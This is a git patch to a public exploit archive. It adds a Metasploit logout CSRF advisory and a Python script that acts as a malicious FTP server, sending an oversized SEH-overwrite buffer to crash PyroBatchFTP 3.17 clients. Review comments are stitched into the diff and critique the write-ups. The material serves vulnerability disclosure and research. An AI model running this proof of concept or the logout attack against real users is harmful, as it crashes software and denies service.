From 99ad37a9180048b461cde0d4f0264965d7052be5 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 9 Oct 2017 05:01:35 +0000
Subject: [PATCH] DB: 2017-10-09 2 new exploits PyroBatchFTP 3.17 - Buffer Overflow (SEH) Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery
---
 files.csv | 2 ++
 platforms/ruby/webapps/42961.txt | 28 +++++++++++++++++++++++++
 platforms/windows/dos/42962.py | 36 ++++++++++++++++++++++++++++++++
 3 files changed, 66 insertions(+)
 create mode 100755 platforms/ruby/webapps/42961.txt
 create mode 100755 platforms/windows/dos/42962.py
diff --git a/files.csv b/files.csv
index 5b2a41fac..1c3604cdc 100644
--- a/files.csv
+++ b/files.csv
@@ -5703,6 +5703,7 @@ id,file,description,date,author,platform,type,port
 42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0
 42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0
 42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0
+42962,platforms/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -38658,3 +38659,4 @@ id,file,description,date,author,platform,type,port
 42954,platforms/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",php,webapps,0
 42956,platforms/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",hardware,webapps,0
 42959,platforms/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",php,webapps,0
+42961,platforms/ruby/webapps/42961.txt,"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",ruby,webapps,0
diff --git a/platforms/ruby/webapps/42961.txt b/platforms/ruby/webapps/42961.txt
new file mode 100755
index 000000000..3200c717a
--- /dev/null
+++ b/platforms/ruby/webapps/42961.txt
@@ -0,0 +1,28 @@
+# Exploit Title: CSRF
+# Date: Wed, Aug 30, 2017
+# Software Link: https://www.metasploit.com/
+# Exploit Author: Dhiraj Mishra
+# Contact: http://twitter.com/mishradhiraj_
+# Website: http://datarift.blogspot.in/
+# CVE: CVE-2017-15084 (R7-2017-22)
+# Category: Metasploit Pro, Express, Ultimate, and Community
+
+
+1. Description
+
+Metasploit Pro, Express, Ultimate, and Community can encounter an issue of cross site request forgery (also known as one-click attack and is abbreviated as CSRF or XSRF), which is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack attempts to exploit the trust that a specific website has in a user's browser.
+
+2. Proof of concept
+
+The MSF did not protect the logout form with csrf token, therefore i can logout any user by sending this url https://Metasploit-Server-IP:3790/logout
+Here's an attack vector:
+
+1) Set up a honeypot that detects MSF scans/attacks (somehow).
+2) Once I get a probe, fire back a logout request.
+3) Continue to logout the active user forever.
+
+It's less damaging than a traditional "hack back" but is sure to irritate the local red team to no end. It's essentially a user DoS. This attack may have been useful as a denial of service against Metasploit instances, allowing an attacker to prevent normal Metasploit usage.
+
+3. Rapid7 Security Bulletin
+
+https://blog.rapid7.com/2017/10/06/vulnerabilities-affecting-four-rapid7-products-fixed/
diff --git a/platforms/windows/dos/42962.py b/platforms/windows/dos/42962.py
new file mode 100755
index 000000000..1d4394d5e
--- /dev/null
+++ b/platforms/windows/dos/42962.py
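Review bot: The "attack vector" in steps 1-3 does not describe a CSRF: a logout request fired from the honeypot host at `https://Metasploit-Server-IP:3790/logout` carries no session cookie and cannot end anyone's session, since the whole point of CSRF is that the victim's own browser is made to issue the request (for example by an `<img src="https://Metasploit-Server-IP:3790/logout">` on a page the operator loads while logged in). The proof-of-concept section should state that precondition explicitly, e.g. `The target operator must have an authenticated Metasploit web UI session in the same browser that renders the attacker-controlled page.` It would also help to repeat in the file body what only the catalogue title says, that the issue is fixed in 4.14.1-20170828, and to note that the unauthenticated GET to /logout is the only endpoint this advisory demonstrates.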
@@ -0,0 +1,36 @@
+#!/usr/bin/python
+
+print "PyroBatchFTP Local Buffer Overflow (SEH) Server"
+
+#Author: Kevin McGuigan @_h3xagram
+#Author Website: https://www.7elements.co.uk
+#Vendor Website: https://www.emtech.com
+#Date: 07/10/2017
+#Version: 3.17
+#Tested on: Windows 7 32-bit
+#CVE: CVE-2017-15035
+
+
+import socket
+import sys
+
+buffer="A" * 2292 + "B" * 4 + "C" * 4 + "D" * 800
+port = 21
+
+try:
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", port))
+    s.listen(5)
+    print("[+] FTP server started on port: "+str(port)+"\r\n")
+except:
+    print("[+] Failed to bind the server to port: "+str(port)+"\r\n")
+
+while True:
+    conn, addr = s.accept()
+    conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n')
+    print(conn.recv(1024))
+    conn.send("331 OK\r\n")
+    print(conn.recv(1024))
+    conn.send('230 OK\r\n')
+    print(conn.recv(1024))
+    conn.send('220 "'+buffer+'" is current directory\r\n')
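Review bot: A bind or listen failure is swallowed by the bare `except:` and the script then falls through into `while True`, where `s.accept()` raises on a socket that was never bound (or a NameError if `socket.socket` itself failed), so the error branch should terminate instead of printing a misleading `[+]` line: `except socket.error as e:` / `    print("[-] Failed to bind the server to port: %d (%s)" % (port, e))` / `    sys.exit(1)` — `sys` is imported but otherwise unused. Each accepted `conn` is also never closed after the final `send`, so a `conn.close()` at the end of the loop body would keep the listener reusable when the client reconnects. The `"A" * 2292 + "B" * 4 + "C" * 4` split looks like the usual pad / nSEH / SEH-handler layout for an SEH overwrite, but the file never says so; a comment such as `# 2292 bytes of padding, 4 bytes nSEH, 4 bytes SEH handler - crash-only PoC, no payload` (offsets to be confirmed in the debugger) would document the intent. Note too that the file mixes the Python 2 `print` statement on line 3 with function-call `print(...)` elsewhere, which pins it to Python 2 despite the parenthesised calls.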